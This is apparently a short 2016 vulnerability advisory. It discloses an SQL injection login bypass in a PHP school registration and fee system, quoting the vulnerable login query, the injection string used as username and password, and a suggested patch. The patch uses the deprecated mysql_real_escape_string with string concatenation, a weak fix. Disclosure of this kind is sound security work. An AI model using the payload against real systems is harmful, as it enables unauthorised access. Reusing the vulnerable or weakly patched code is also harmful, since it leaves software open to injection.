School Registration And Fee System Authentication Bypass
Posted on 02 November 2016
# Exploit Title.............. School Registration and Fee System Auth Bypass # Google Dork................ N/A # Date....................... 01/11/2016 # Exploit Author............. opt1lc # Vendor Homepage............ http://www.sourcecodester.com/php/10932/school-registration-and-fee-system.html # Software Link.............. http://www.sourcecodester.com/sites/default/files/download/hemedy99/bilal_final.zip # Version.................... N/A # Tested on.................. XAMPP # CVE........................ N/A # File....................... bilal_final/login.php --------------------------------------------------- ----snip---- $username = $_POST['username']; $password = $_POST['password']; /* student */ $query = "SELECT * FROM users WHERE username='$username' AND password='$password'"; $result = mysql_query($query)or die(mysql_error()); $row = mysql_fetch_array($result); ----snip---- --------------------------------------------------- Exploit ------- You can login with username and password : administrator' or '1'='1 Patching ------- You can use one of function in PHP : mysql_real_escape_string() to --------------------------------------------------- ----snip---- $username = mysql_real_escape_string($_POST['username']); $password = mysql_real_escape_string($_POST['password']); /* student */ $query = "SELECT * FROM users WHERE username='$username' AND password='$password'"; $result = mysql_query($query)or die(mysql_error()); $row = mysql_fetch_array($result); ----snip---- --------------------------------------------------- Credit ------- This vulnerability was discovered and researched by opt1lc Shout ------- My Beautiful Daughter & My Wife Reference ------- http://php.net/manual/en/function.mysql-real-escape-string.php
